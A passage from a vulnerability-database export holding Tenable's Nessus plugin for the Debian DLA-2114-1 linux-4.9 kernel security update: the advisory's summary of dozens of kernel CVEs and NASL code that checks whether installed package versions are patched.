"nessus", "title": "Debian DLA-2114-1 : linux-4.9 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-13093", "CVE-2018-13094", "CVE-2018-20976", "CVE-2018-21008", "CVE-2019-0136", "CVE-2019-10220", "CVE-2019-14615", "CVE-2019-14814", "CVE-2019-14815", "CVE-2019-14816", "CVE-2019-14895", "CVE-2019-14896", "CVE-2019-14897", "CVE-2019-14901", "CVE-2019-15098", "CVE-2019-15217", "CVE-2019-15291", "CVE-2019-15505", "CVE-2019-15917", "CVE-2019-16746", "CVE-2019-17052", "CVE-2019-17053", "CVE-2019-17054", "CVE-2019-17055", "CVE-2019-17056", "CVE-2019-17075", "CVE-2019-17133", "CVE-2019-17666", "CVE-2019-18282", "CVE-2019-18683", "CVE-2019-18809", "CVE-2019-19037", "CVE-2019-19051", "CVE-2019-19052", "CVE-2019-19056", "CVE-2019-19057", "CVE-2019-19062", "CVE-2019-19066", "CVE-2019-19068", "CVE-2019-19227", "CVE-2019-19332", "CVE-2019-19447", "CVE-2019-19523", "CVE-2019-19524", "CVE-2019-19525", "CVE-2019-19527", "CVE-2019-19530", "CVE-2019-19531", "CVE-2019-19532", "CVE-2019-19533", "CVE-2019-19534", "CVE-2019-19535", "CVE-2019-19536", "CVE-2019-19537", "CVE-2019-19767", "CVE-2019-19947", "CVE-2019-19965", "CVE-2019-20096", "CVE-2019-2215"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.9-arm", "p-cpe:/a:debian:debian_linux:linux-doc-4.9", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-686", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-686-pae", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-armel", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-armhf", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-i386", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-armmp", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-armmp-lpae", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-common", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-common-rt", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-marvell", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-rt-686-pae", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-rt-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686-pae", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686-pae-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-armmp", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-armmp-lpae", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-marvell", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-686-pae", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-686-pae-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-kbuild-4.9", "p-cpe:/a:debian:debian_linux:linux-manual-4.9", "p-cpe:/a:debian:debian_linux:linux-perf-4.9", "p-cpe:/a:debian:debian_linux:linux-source-4.9", "p-cpe:/a:debian:debian_linux:linux-support-4.9.0-0.bpo.7", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-2114.NASL", "href": "https://www.tenable.com/plugins/nessus/134240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2114-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134240);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-13093\", \"CVE-2018-13094\", \"CVE-2018-20976\", \"CVE-2018-21008\", \"CVE-2019-0136\", \"CVE-2019-10220\", \"CVE-2019-14615\", \"CVE-2019-14814\", \"CVE-2019-14815\", \"CVE-2019-14816\", \"CVE-2019-14895\", \"CVE-2019-14896\", \"CVE-2019-14897\", \"CVE-2019-14901\", \"CVE-2019-15098\", \"CVE-2019-15217\", \"CVE-2019-15291\", \"CVE-2019-15505\", \"CVE-2019-15917\", \"CVE-2019-16746\", \"CVE-2019-17052\", \"CVE-2019-17053\", \"CVE-2019-17054\", \"CVE-2019-17055\", \"CVE-2019-17056\", \"CVE-2019-17075\", \"CVE-2019-17133\", \"CVE-2019-17666\", \"CVE-2019-18282\", \"CVE-2019-18683\", \"CVE-2019-18809\", \"CVE-2019-19037\", \"CVE-2019-19051\", \"CVE-2019-19052\", \"CVE-2019-19056\", \"CVE-2019-19057\", \"CVE-2019-19062\", \"CVE-2019-19066\", \"CVE-2019-19068\", \"CVE-2019-19227\", \"CVE-2019-19332\", \"CVE-2019-19447\", \"CVE-2019-19523\", \"CVE-2019-19524\", \"CVE-2019-19525\", \"CVE-2019-19527\", \"CVE-2019-19530\", \"CVE-2019-19531\", \"CVE-2019-19532\", \"CVE-2019-19533\", \"CVE-2019-19534\", \"CVE-2019-19535\", \"CVE-2019-19536\", \"CVE-2019-19537\", \"CVE-2019-19767\", \"CVE-2019-19947\", \"CVE-2019-19965\", \"CVE-2019-20096\", \"CVE-2019-2215\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DLA-2114-1 : linux-4.9 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2018-13093, CVE-2018-13094\n\nWen Xu from SSLab at Gatech reported several NULL pointer dereference\nflaws that may be triggered when mounting and operating a crafted XFS\nvolume. An attacker able to mount arbitrary XFS volumes could use this\nto cause a denial of service (crash).\n\nCVE-2018-20976\n\nIt was discovered that the XFS file-system implementation did not\ncorrectly handle some mount failure conditions, which could lead to a\nuse-after-free. The security impact of this is unclear.\n\nCVE-2018-21008\n\nIt was discovered that the rsi wifi driver did not correctly handle\nsome failure conditions, which could lead to a use-after- free. The\nsecurity impact of this is unclear.\n\nCVE-2019-0136\n\nIt was discovered that the wifi soft-MAC implementation (mac80211) did\nnot properly authenticate Tunneled Direct Link Setup (TDLS) messages.\nA nearby attacker could use this for denial of service (loss of wifi\nconnectivity).\n\nCVE-2019-2215\n\nThe syzkaller tool discovered a use-after-free vulnerability in the\nAndroid binder driver. A local user on a system with this driver\nenabled could use this to cause a denial of service (memory corruption\nor crash) or possibly for privilege escalation. However, this driver\nis not enabled on Debian packaged kernels.\n\nCVE-2019-10220\n\nVarious developers and researchers found that if a crafted file-\nsystem or malicious file server presented a directory with filenames\nincluding a '/' character, this could confuse and possibly defeat\nsecurity checks in applications that read the directory.\n\nThe kernel will now return an error when reading such a\ndirectory, rather than passing the invalid filenames on to\nuser-space.\n\nCVE-2019-14615\n\nIt was discovered that Intel 9th and 10th generation GPUs did not\nclear user-visible state during a context switch, which resulted in\ninformation leaks between GPU tasks. This has been mitigated in the\ni915 driver.\n\nThe affected chips (gen9 and gen10) are listed at\n<https://en.wikipedia.org/wiki/List_of_Intel_graphics_proces\nsing_units#Gen9>.\n\nCVE-2019-14814, CVE-2019-14815, CVE-2019-14816\n\nMultiple bugs were discovered in the mwifiex wifi driver, which could\nlead to heap buffer overflows. A local user permitted to configure a\ndevice handled by this driver could probably use this for privilege\nescalation.\n\nCVE-2019-14895, CVE-2019-14901\n\nADLab of Venustech discovered potential heap buffer overflows in the\nmwifiex wifi driver. On systems using this driver, a malicious\nWireless Access Point or adhoc/P2P peer could use these to cause a\ndenial of service (memory corruption or crash) or possibly for remote\ncode execution.\n\nCVE-2019-14896, CVE-2019-14897\n\nADLab of Venustech discovered potential heap and stack buffer\noverflows in the libertas wifi driver. On systems using this driver, a\nmalicious Wireless Access Point or adhoc/P2P peer could use these to\ncause a denial of service (memory corruption or crash) or possibly for\nremote code execution.\n\nCVE-2019-15098\n\nHui Peng and Mathias Payer reported that the ath6kl wifi driver did\nnot properly validate USB descriptors, which could lead to a NULL pointer derefernce. An attacker able to add USB devices could use this\nto cause a denial of service (BUG/oops).\n\nCVE-2019-15217\n\nThe syzkaller tool discovered that the zr364xx mdia driver did not\ncorrectly handle devices without a product name string, which could\nlead to a NULL pointer dereference. An attacker able to add USB\ndevices could use this to cause a denial of service (BUG/oops).\n\nCVE-2019-15291\n\nThe syzkaller tool discovered that the b2c2-flexcop-usb media driver\ndid not properly validate USB descriptors, which could lead to a NULL pointer dereference. An attacker able to add USB devices could use\nthis to cause a denial of service (BUG/oops).\n\nCVE-2019-15505\n\nThe syzkaller tool discovered that the technisat-usb2 media driver did\nnot properly validate incoming IR packets, which could lead to a heap\nbuffer over-read. An attacker able to add USB devices could use this\nto cause a denial of service (BUG/oops) or to read sensitive\ninformation from kernel memory.\n\nCVE-2019-15917\n\nThe syzkaller tool found a race condition in code supporting\nUART-attached Bluetooth adapters, which could lead to a use-\nafter-free. A local user with access to a pty device or other suitable\ntty device could use this to cause a denial of service (memory\ncorruption or crash) or possibly for privilege escalation.\n\nCVE-2019-16746\n\nIt was discovered that the wifi stack did not validate the content of\nbeacon heads provided by user-space for use on a wifi interface in\nAccess Point mode, which could lead to a heap buffer overflow. A local\nuser permitted to configure a wifi interface could use this to cause a\ndenial of service (memory corruption or crash) or possibly for\nprivilege escalation.\n\nCVE-2019-17052, CVE-2019-17053, CVE-2019-17054, CVE-2019-17055,\nCVE-2019-17056\n\nOri Nimron reported that various network protocol implementations\n\n - AX.25, IEEE 802.15.4, Appletalk, ISDN, and NFC - allowed\n all users to create raw sockets. A local user could use\n this to send arbitrary packets on networks using those\n protocols.\n\nCVE-2019-17075\n\nIt was found that the cxgb4 Infiniband driver requested DMA (Direct\nMemory Access) to a stack-allocated buffer, which is not supported and\non some systems can result in memory corruption of the stack. A local\nuser might be able to use this for denial of service (memory\ncorruption or crash) or possibly for privilege escalation.\n\nCVE-2019-17133\n\nNicholas Waisman reported that the wifi stack did not valdiate\nreceived SSID information before copying it, which could lead to a\nbuffer overflow if it is not validated by the driver or firmware. A\nmalicious Wireless Access Point might be able to use this to cause a\ndenial of service (memory corruption or crash) or for remote code\nexecution.\n\nCVE-2019-17666\n\nNicholas Waisman reported that the rtlwifi wifi drivers did not\nproperly validate received P2P information, leading to a buffer\noverflow. A malicious P2P peer could use this to cause a denial of\nservice (memory corruption or crash) or for remote code execution.\n\nCVE-2019-18282\n\nJonathan Berger, Amit Klein, and Benny Pinkas discovered that the\ngeneration of UDP/IPv6 flow labels used a weak hash function, 'jhash'.\nThis could enable tracking individual computers as they communicate\nwith different remote servers and from different networks. The\n'siphash' function is now used instead.\n\nCVE-2019-18683\n\nMultiple race conditions were discovered in the vivid media driver,\nused for testing Video4Linux2 (V4L2) applications, These race\nconditions could result in a use-after-free. On a system where this\ndriver is loaded, a user with permission to access media devices could\nuse this to cause a denial of service (memory corruption or crash) or\npossibly for privilege escalation.\n\nCVE-2019-18809\n\nNavid Emamdoost discovered a potential memory leak in the af9005 media\ndriver if the device fails to respond to a command. The security\nimpact of this is unclear.\n\nCVE-2019-19037\n\nIt was discovered that the ext4 filesystem driver did not correctly\nhandle directories with holes (unallocated regions) in them. An\nattacker able to mount arbitrary ext4 volumes could use this to cause\na denial of service (crash).\n\nCVE-2019-19051\n\nNavid Emamdoost discovered a potential memory leak in the i2400m wimax\ndriver if the software rfkill operation fails. The security impact of\nthis is unclear.\n\nCVE-2019-19052\n\nNavid Emamdoost discovered a potential memory leak in the gs_usb CAN\ndriver if the open (interface-up) operation fails. The security impact\nof this is unclear.\n\nCVE-2019-19056, CVE-2019-19057\n\nNavid Emamdoost discovered potential memory leaks in the mwifiex wifi\ndriver if the probe operation fails. The security impact of this is\nunclear.\n\nCVE-2019-19062\n\nNavid Emamdoost discovered a potential memory leak in the AF_ALG\nsubsystem if the CRYPTO_MSG_GETALG operation fails. A local user could\npossibly use this to cause a denial of service (memory exhaustion).\n\nCVE-2019-19066\n\nNavid Emamdoost discovered a potential memory leak in the bfa SCSI\ndriver if the get_fc_host_stats operation fails. The security impact\nof this is unclear.\n\nCVE-2019-19068\n\nNavid Emamdoost discovered a potential memory leak in the rtl8xxxu\nwifi driver, in case it fails to submit an interrupt buffer to the\ndevice. The security impact of this is unclear.\n\nCVE-2019-19227\n\nDan Carpenter reported missing error checks in the Appletalk protocol\nimplementation that could lead to a NULL pointer dereference. The\nsecurity impact of this is unclear.\n\nCVE-2019-19332\n\nThe syzkaller tool discovered a missing bounds check in the KVM\nimplementation for x86, which could lead to a heap buffer overflow. A\nlocal user permitted to use KVM could use this to cause a denial of\nservice (memory corruption or crash) or possibly for privilege\nescalation.\n\nCVE-2019-19447\n\nIt was discovered that the ext4 filesystem driver did not safely\nhandle unlinking of an inode that, due to filesystem corruption,\nalready has a link count of 0. An attacker able to mount arbitrary\next4 volumes could use this to cause a denial of service (memory\ncorruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19523\n\nThe syzkaller tool discovered a use-after-free bug in the adutux USB\ndriver. An attacker able to add and remove USB devices could use this\nto cause a denial of service (memory corruption or crash) or possibly\nfor privilege escalation.\n\nCVE-2019-19524\n\nThe syzkaller tool discovered a race condition in the ff-memless\nlibrary used by input drivers. An attacker able to add and remove USB\ndevices could use this to cause a denial of service (memory corruption\nor crash) or possibly for privilege escalation.\n\nCVE-2019-19525\n\nThe syzkaller tool discovered a use-after-free bug in the atusb driver\nfor IEEE 802.15.4 networking. An attacker able to add and remove USB\ndevices could possibly use this to cause a denial of service (memory\ncorruption or crash) or for privilege escalation.\n\nCVE-2019-19527\n\nThe syzkaller tool discovered that the hiddev driver did not correctly\nhandle races between a task opening the device and disconnection of\nthe underlying hardware. A local user permitted to access hiddev\ndevices, and able to add and remove USB devices, could use this to\ncause a denial of service (memory corruption or crash) or possibly for\nprivilege escalation.\n\nCVE-2019-19530\n\nThe syzkaller tool discovered a potential use-after-free in the\ncdc-acm network driver. An attacker able to add USB devices could use\nthis to cause a denial of service (memory corruption or crash) or\npossibly for privilege escalation.\n\nCVE-2019-19531\n\nThe syzkaller tool discovered a use-after-free bug in the yurex USB\ndriver. An attacker able to add and remove USB devices could use this\nto cause a denial of service (memory corruption or crash) or possibly\nfor privilege escalation.\n\nCVE-2019-19532\n\nThe syzkaller tool discovered a potential heap buffer overflow in the\nhid-gaff input driver, which was also found to exist in many other\ninput drivers. An attacker able to add USB devices could use this to\ncause a denial of service (memory corruption or crash) or possibly for\nprivilege escalation.\n\nCVE-2019-19533\n\nThe syzkaller tool discovered that the ttusb-dec media driver was\nmissing initialisation of a structure, which could leak sensitive\ninformation from kernel memory.\n\nCVE-2019-19534, CVE-2019-19535, CVE-2019-19536\n\nThe syzkaller tool discovered that the peak_usb CAN driver was missing\ninitialisation of some structures, which could leak sensitive\ninformation from kernel memory.\n\nCVE-2019-19537\n\nThe syzkaller tool discovered race conditions in the USB stack,\ninvolving character device registration. An attacker able to add USB\ndevices could use this to cause a denial of service (memory corruption\nor crash) or possibly for privilege escalation.\n\nCVE-2019-19767\n\nThe syzkaller tool discovered that crafted ext4 volumes could trigger\na buffer overflow in the ext4 filesystem driver. An attacker able to\nmount such a volume could use this to cause a denial of service\n(memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19947\n\nIt was discovered that the kvaser_usb CAN driver was missing\ninitialisation of some structures, which could leak sensitive\ninformation from kernel memory.\n\nCVE-2019-19965\n\nGao Chuan reported a race condition in the libsas library used by SCSI\nhost drivers, which could lead to a NULL pointer dereference. An\nattacker able to add and remove SCSI devices could use this to cause a\ndenial of service (BUG/oops).\n\nCVE-2019-20096\n\nThe Hulk Robot tool discovered a potential memory leak in the DCCP\nprotocol implementation. This may be exploitable by local users, or by\nremote attackers if the system uses DCCP, to cause a denial of service\n(out of memory).\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n4.9.210-1~deb8u1. This update additionally fixes Debian bugs #869511\nand 945023; and includes many more bug fixes from stable updates\n4.9.190-4.9.210 inclusive.\n\nWe recommend that you upgrade your linux-4.9 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n # https://en.wikipedia.org/wiki/List_of_Intel_graphics_processing_units#Gen9\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?09b1ea0a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/linux-4.9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android Binder Use-After-Free Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.9-arm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-4.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-armel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-armhf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-common-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-marvell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-rt-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-rt-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-marvell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-kbuild-4.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-manual-4.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-perf-4.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-4.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-4.9.0-0.bpo.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.9-arm\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-doc-4.9\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-686\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-686-pae\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-all\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-all-amd64\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-all-armel\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-all-armhf\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-all-i386\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-amd64\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-armmp\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-armmp-lpae\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-common\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-common-rt\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-marvell\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-rt-686-pae\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-rt-amd64\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-686\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-686-pae\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-686-pae-dbg\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-amd64\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-amd64-dbg\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-armmp\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-armmp-lpae\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-marvell\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-rt-686-pae\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-rt-686-pae-dbg\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-rt-amd64\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-rt-amd64-dbg\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-kbuild-4.9\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-manual-4.9\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-perf-4.9\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-source-4.9\", reference:\"4.9.210-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-support-4.9.0-0.bpo.7\", reference:\"4.9.210-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 